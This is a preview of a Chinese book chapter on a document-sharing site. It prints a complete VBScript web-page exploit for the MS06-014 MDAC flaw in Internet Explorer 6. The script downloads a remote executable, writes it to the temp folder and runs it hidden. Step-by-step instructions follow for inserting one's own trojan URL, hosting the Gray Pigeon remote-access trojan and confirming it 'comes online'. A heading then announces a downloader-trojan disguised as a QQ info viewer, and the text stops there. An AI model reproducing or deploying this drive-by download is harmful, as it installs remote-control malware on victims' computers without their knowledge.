文档详情

第九章 实例.pdf

发布:2017-06-08约6.39千字共7页下载文档
文本预览下载声明
第九章 两个实例 在最后一章里,将介绍两个实例,这两个例子都很简单,在第二个 “QQ 信息查询器”这个例子中,用户只要用一点 microsoft visual basic 编程基础即可完成这个程序. 9.1 ms06-014 网马 微软安全公告号:ms06-014 发布时间:2006-4-11 漏洞述描:Microsoft Data Access Components(MDAC)功能中的漏洞充许远程代码执行 此漏洞补丁下载:/china/technet/security/bulletin/MS06-014.mspx 受影响的操作系统版本和 office 版本: Windwso xp , ie6.0 ,access2003 这个漏洞公布的时间已经很长了, 由于受影响的IE 6.0 几乎没有人用了,并且这个针 对这个漏洞的攻击代码在网上也可以找到,因此我想我可以打破”沉默”,公布其漏洞的攻击代 码,代码如下: html head script language=VBScript on error resume next download = /server_setup.exe Set dE = document.createElement(object) dE.setAttribute classid, clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 str=Microsoft.XMLHTTP Set str = dE.CreateObject(str,) str1=Ado str2=db. str3=Str str4=eam str5=str1str2str3str4 str6=str5 set S = dE.createobject(str6,) S.type = 1 str7=GET str.Open str7, download, False str.Send filename=Nonsenser.Com set Fso = dE.createobject(Scripting.FileSystemObject,) set tmp = Fso.GetSpecialFolder(2) filename= Fso.BuildPath(tmp,filename) S.open S.write str.responseBody S.savetofile filename,2 S.close set Exe = dE.createobject(Shell.Application,) Exe.ShellExecute filename,,,open,0 /script titletest ms06-014/title /head body center这是一个测试 ms06-014 的页面,此漏洞发布时间 2006-4-11/center /body /html 测试方法如下: 1. 这个漏洞只存在于IE 6.0,为了保证测试顺利,确保系经使用的是IE 6.0,并且系统安装 了office,还有最重要的是这个漏洞还没有打补丁. 2.修改第5行代码,把/server_setup.exe修改成你自已的木马地址 3.上传一个木马到空间,本例以灰鸽子(server_setup.exe)为例. 4.把以上代码保存为 “ms06-014.htm”并且上传到空间. 5.在本地浏览器中输入网马的地址. 6.如果灰鸽子上线了则说明测试成功. 9.2 QQ 信息查看器+下载者木马 9.2 QQ 信息查看器+下载者木马 程序名称:
显示全部
相似文档